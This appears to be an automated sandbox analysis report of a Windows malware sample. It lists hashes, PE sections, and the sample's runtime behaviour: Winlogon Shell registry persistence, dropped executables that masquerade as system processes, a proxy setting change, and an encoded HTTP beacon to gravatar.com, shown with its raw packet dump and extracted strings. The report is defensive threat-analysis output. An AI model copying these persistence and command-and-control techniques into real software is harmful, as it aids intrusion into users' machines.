Analysis Date2014-08-28 19:38:27
MD5faa8e39577c7f2bb86d64e0dbea3f52d
SHA1921d3a827b13db86cba8ae9d5cfb6932ccb519b6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: cfca97af2af4e443db83e437c11c6145 sha1: 6a69343565194206040fa5aa1893bed1cc719f33 size: 177152
Section.rdata md5: 68cf7ddb03e63cee60250514d5742274 sha1: b0203599664433ac966266d6fcc45e78691bc812 size: 2048
Section.data md5: c5228b16da96b9ff17d59a4aa001ab55 sha1: 47f68948d5a2e5c4ba6f749b367c3f64bca55eb9 size: 21504
Section.lib md5: b98f176478096ec4e4ce0d7ea38604f3 sha1: 10e53ef3777dbc261be3e9e530e8443ba01f4a1e size: 512
Timestamp2005-09-25 04:36:33
VersionPrivateBuild: 1522
PEhashc4dc7f24e0cb68e49573d5445103676ab33e5701
IMPhash4c2ce85f346df42394d25c8a8f64a654

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSzonekg.com
Winsock DNSgravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSgravatar.com
Type: A
192.0.80.240
DNSzonekg.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v66=66&tq=gKZEtzymtSpDE%2FH6wLwSoh1vUZeBxJ372eLH4rw4LADAq%2F1jZrHrICRe7NJto1CugYzMyc69NDh1kAfaXKi3PuL0pp6GY2NjElj53tmf6DIM7rMGyPJeFOrboW60I1fCqsj0PG7FcnCr3oFR0iEIxJ36%2B8QfCaAzaW8nCOBW5YV8geRijtcdcI540CEvMM4ebL14YtA8a%2BMl%2B24iJVYFOz4%2FSReMvzQr2yWRYNBeHAsQYYC3sFBpPx92gQnez4PCzzoZMTLkHG%2Fk3q4KVjdvnqPFmomOfD%2BLa4y46qn2k5NJjXhDLX2AdH2UrAjC97jvym8Vq4c8kBcmkFFKYKUF6w6L4BnjTJIUFoPamlyeQF2lCdtICk9kHMkSVS5aqU1jZkxu1axEwuitEGgjSM7HJE7SKdiNKFwF3Ct5e%2FiXMjpnzomFQrWUL%2FHxfHom6EDgnrIkq7M9rNR5XtIUEoU1UmRYb6VME4
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 192.0.80.241:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763636   bcfe64067be2?v66
0x00000040 (00064)   3d363626 74713d67 4b5a4574 7a796d74   =66&tq=gKZEtzymt
0x00000050 (00080)   53704445 25324648 36774c77 536f6831   SpDE%2FH6wLwSoh1
0x00000060 (00096)   76555a65 42784a33 3732654c 48347277   vUZeBxJ372eLH4rw
0x00000070 (00112)   344c4144 41712532 46316a5a 72487249   4LADAq%2F1jZrHrI
0x00000080 (00128)   43526537 4e4a746f 31437567 597a4d79   CRe7NJto1CugYzMy
0x00000090 (00144)   6336394e 4468316b 41666158 4b693350   c69NDh1kAfaXKi3P
0x000000a0 (00160)   754c3070 70364759 324e6a45 6c6a3533   uL0pp6GY2NjElj53
0x000000b0 (00176)   746d6636 44494d37 724d4779 504a6546   tmf6DIM7rMGyPJeF
0x000000c0 (00192)   4f72626f 57363049 31664371 736a3050   OrboW60I1fCqsj0P
0x000000d0 (00208)   47374663 6e437233 6f465230 69454978   G7FcnCr3oFR0iEIx
0x000000e0 (00224)   4a333625 32423851 66436141 7a615738   J36%2B8QfCaAzaW8
0x000000f0 (00240)   6e434f42 57355956 38676552 696a7463   nCOBW5YV8geRijtc
0x00000100 (00256)   64634935 34304345 764d4d34 65624c31   dcI540CEvMM4ebL1
0x00000110 (00272)   34597441 38612532 424d6c25 32423234   4YtA8a%2BMl%2B24
0x00000120 (00288)   694a5659 464f7a34 25324653 52654d76   iJVYFOz4%2FSReMv
0x00000130 (00304)   7a517232 79575259 4e426548 41735159   zQr2yWRYNBeHAsQY
0x00000140 (00320)   59433373 46427050 78393267 516e657a   YC3sFBpPx92gQnez
0x00000150 (00336)   3450437a 7a6f5a4d 544c6b48 47253246   4PCzzoZMTLkHG%2F
0x00000160 (00352)   6b337134 4b566a64 766e7150 466d6f6d   k3q4KVjdvnqPFmom
0x00000170 (00368)   4f664425 32424c61 34793436 716e326b   OfD%2BLa4y46qn2k
0x00000180 (00384)   354e4a6a 5868444c 58324164 48325572   5NJjXhDLX2AdH2Ur
0x00000190 (00400)   416a4339 376a7679 6d385671 3463386b   AjC97jvym8Vq4c8k
0x000001a0 (00416)   42636d6b 46464b59 4b554636 77364c34   BcmkFFKYKUF6w6L4
0x000001b0 (00432)   426e6a54 4a495546 6f50616d 6c796551   BnjTJIUFoPamlyeQ
0x000001c0 (00448)   46326c43 64744943 6b396b48 4d6b5356   F2lCdtICk9kHMkSV
0x000001d0 (00464)   53356171 55316a5a 6b787531 61784577   S5aqU1jZkxu1axEw
0x000001e0 (00480)   75697445 47676a53 4d37484a 4537534b   uitEGgjSM7HJE7SK
0x000001f0 (00496)   64694e4b 46774633 43743565 25324669   diNKFwF3Ct5e%2Fi
0x00000200 (00512)   584d6a70 6e7a6f6d 46517257 554c2532   XMjpnzomFQrWUL%2
0x00000210 (00528)   46487866 486f6d36 4544676e 72496b71   FHxfHom6EDgnrIkq
0x00000220 (00544)   374d3972 4e523558 74495545 6f553155   7M9rNR5XtIUEoU1U
0x00000230 (00560)   6d525962 36564d45 34204854 54502f31   mRYb6VME4 HTTP/1
0x00000240 (00576)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000250 (00592)   636c6f73 650d0a48 6f73743a 20677261   close..Host: gra
0x00000260 (00608)   76617461 722e636f 6d0d0a41 63636570   vatar.com..Accep
0x00000270 (00624)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000280 (00640)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000290 (00656)   0a0d0a                                ...


Strings
.g.X;.4....
.d.
v
X.LNaz
.S\.5..h....
U..
......C..
d...
.f..[(.
.^}..
.
@
i...y/...q...
....D
...
....<.5.
j
.....
..|.
a..p.....no2"rK..Q$...
|.'L....
...H..^2..\...FI
.
..
?B.....R.y.f....y..s....
v.{Gm...
7l@X,.....)
..BK
.
040904b0
1522
Df%S
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
.2ER+/
>4`-R8>
[5?:u0
6~ 44S
6b	Ls Rb
71T}m;uO
7,n^l@
7!=p$Cu/
+{8IV_!
~)9W@b
aK_>7L
CallNextHookEx
ChildWindowFromPoint
ClipCursor
COMCTL32.dll
comdlg32.dll
CompareStringW
CQw."E
CreateFiber
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DQu'w%3
DrawEdge
E(cd9y
EmptyClipboard
EnumResourceNamesW
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
gbs'rL
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
h>;/^R
i8WirV'
;Ii/6K(J
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
;&j:|F
J#g8)HmovA
Ji[nzg
JRichu
KERNEL32.dll
Kk/o+"
)k!Tl{
LiXaPk#d
LocalAlloc
LockFile
lO[QCp
MonitorFromWindow
M)[VQnw
Mw`kJ0
N1gj3:
NdrClientCall
:]Nj\j
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
pZ:,:O
QtI%DX
 ~ R4Y
`.rdata
RegisterClassW
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
s"O	pF
stUV^^
TDo?H|
!This program cannot be run in DOS mode.
_]TlT!
ToAscii
>	t>oN
tXK7=c
Tz)V(B
u.e14#
U_Lu=!
UnhookWindowsHookEx
UnlockFile
USER32.dll
VerLanguageNameW
vT"u-Y
=VY[t?
wC5Te0>
WinHelpW
w\KO_/
-wM[m|
WriteFileGather
!WS[cfl
x7(kx'
Xj'2a0V
\",$Xk
>xq%P&
xUjlU_A
x._x4e
yCFDWj
Z5k*}nn2
ZJ-%V8g
zLJ;mD
Z+.):X-l